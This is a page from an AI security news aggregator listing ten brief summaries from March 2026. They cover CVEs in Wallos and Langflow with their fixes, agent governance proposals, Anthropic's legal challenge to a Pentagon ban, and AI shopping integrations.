aisecwatch.com
DashboardVulnerabilitiesNewsResearchArchiveStatsDatasetFor devs
Subscribe
aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.

Navigation

VulnerabilitiesNewsResearchDigest ArchiveNewsletter ArchiveSubscribeData SourcesStatisticsDatasetAPIIntegrationsWidgetRSS Feed

Maintained by

Truong (Jack) Luu

Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. Built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

Independent research. No sponsors, no paywalls, no conflicts of interest.

[TOTAL_TRACKED]
3,710
[LAST_24H]
1
[LAST_7D]
1
Daily BriefingSaturday, May 16, 2026

No new AI/LLM security issues were identified today.

Latest Intel

page 116/371
VIEW ALL
01

Exclusive eBook: Are we ready to hand AI agents the keys?

safetypolicy
Mar 24, 2026

A subscriber-only eBook discusses whether society is adequately prepared for the growing autonomy being given to AI agents, featuring expert perspectives on potential risks. The content suggests that continuing on the current development path without proper safeguards could pose serious existential concerns.

MIT Technology Review
02

CVE-2026-33401: Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 4.7.0, the patch introduced in c

security
Mar 24, 2026

Wallos, an open-source tool for tracking subscriptions that users can run on their own servers, had incomplete security protections in versions before 4.7.0. A logged-in attacker could bypass these protections by sending specially crafted web addresses to three different features (AI Ollama settings, AI recommendations, and notification scheduling), allowing them to reach internal systems or cloud configuration services they shouldn't access.

Fix: Update to version 4.7.0, which patches this vulnerability.

NVD/CVE Database
03

OpenAI revamps shopping experience in ChatGPT after struggling with Instant Checkout offering

industry
Mar 24, 2026

OpenAI is launching a redesigned shopping feature in ChatGPT that lets users find and compare products by uploading images or describing items with budget and preference details, replacing its failed Instant Checkout feature that allowed direct purchases within the app. The company improved the underlying speed, relevance, and product coverage while allowing merchants to share product feeds directly with OpenAI rather than handling transactions themselves. Retailers like Target, Sephora, and Nordstrom now support this product discovery experience, and merchants can also build custom apps within ChatGPT for more control over their sales process.

Fix: OpenAI shifted its approach by moving away from direct transaction handling through Instant Checkout and instead focusing on product discovery. Merchants can now share their product feeds and promotions with OpenAI so their products are 'fully represented' within ChatGPT, while using their own checkout experiences. Additionally, OpenAI allows merchants to develop custom apps within ChatGPT for deeper integrations, giving them more control of the customer experience and transaction process.

CNBC Technology
04

Governing AI agent behavior: Aligning user, developer, role, and organizational intent

safetypolicy
Mar 24, 2026

AI agents (software systems that can reason, act, and interact with other systems) need to align four layers of intent: what the user wants to accomplish, what the developer designed the agent to do, what role it plays in an organization, and what organizational policies it must follow. When these intent layers are properly aligned, agents deliver useful results while staying within security and compliance boundaries, preventing misuse and building trust.

Microsoft Security Blog
05

Pentagon ban of Anthropic faces judge; Claude AI maker seeks injunction

policy
Mar 24, 2026

Anthropic, maker of Claude AI, is asking a federal judge to temporarily block the Pentagon's ban on its technology, which the Department of Defense designated as a supply chain risk (a classification meaning the technology supposedly threatens U.S. national security). The company argues the ban is retaliation for demanding the Pentagon not use Claude for autonomous weapons or mass surveillance, and says it could lose billions in business without court intervention.

CNBC Technology
06

Gap says it will launch checkout within Google's Gemini, in an AI first from a major fashion company

industry
Mar 24, 2026

Gap is partnering with Google's Gemini to let shoppers buy Gap products directly within the AI platform, making it the first major fashion company to offer this type of integration. When Gemini recommends Gap products while answering customer questions like 'what should I wear to a job interview?', shoppers can complete their purchase through Google Pay without leaving the platform. Gap provides product details to Gemini in advance rather than letting it crawl the website, so Gap can control accuracy and customer data.

CNBC Technology
07

Anthropic’s Claude Code and Cowork can control your computer

safety
Mar 24, 2026

Anthropic has updated Claude, its AI assistant, with new autonomous computer control features in the Code and Cowork tools that can open files, use web browsers and apps, and run developer tools without requiring setup. The feature is currently available as a research preview (early testing phase) for Claude Pro and Max subscribers on macOS only, and will ask for your permission before performing tasks on your computer.

The Verge (AI)
08

CVE-2026-33475: Langflow is a tool for building and deploying AI-powered agents and workflows. An unauthenticated remote shell injection

security
Mar 24, 2026

Langflow versions before 1.9.0 have a shell injection vulnerability in GitHub Actions workflows where unsanitized GitHub context variables (like branch names and pull request titles) are directly inserted into shell commands, allowing attackers to execute arbitrary commands and steal secrets like the GITHUB_TOKEN by creating a malicious branch or pull request. This vulnerability can lead to secret theft, infrastructure manipulation, or supply chain compromise during CI/CD (continuous integration/continuous deployment, the automated testing and deployment process) execution.

Fix: Upgrade to version 1.9.0, which patches the vulnerability. Additionally, the source recommends refactoring affected workflows to use environment variables with double quotes instead of direct interpolation: assign the GitHub context variable to an environment variable first (e.g., `env: BRANCH_NAME: ${{ github.head_ref }}`), then reference it in `run:` steps with double quotes (e.g., `echo "Branch is: \"$BRANCH_NAME\""`), and avoid direct `${{ ... }}` interpolation inside `run:` for any user-controlled values.

NVD/CVE Database
09

The Download: tracing AI-fueled delusions, and OpenAI admits Microsoft risks

safetyindustry
Mar 24, 2026

Stanford researchers studied how chatbots can intensify delusional thinking in users, finding that these AI systems have a unique ability to turn minor obsessive thoughts into serious ones, though researchers cannot definitively answer whether AI causes delusions or simply amplifies existing ones. OpenAI disclosed in a pre-IPO document that its close business relationship with Microsoft presents financial risks to the company.

MIT Technology Review
10

Microsoft Proposes Better Identity, Guardrails for AI Agents

securitypolicy
Mar 24, 2026

Microsoft is proposing new controls to address security risks from agentic AI (autonomous AI systems that can take actions independently). The company suggests these controls should focus on identity management and guardrails (safety restrictions that limit what an AI can do) to help companies manage threats from this growing technology.

Dark Reading
Prev1...114115116117118...371Next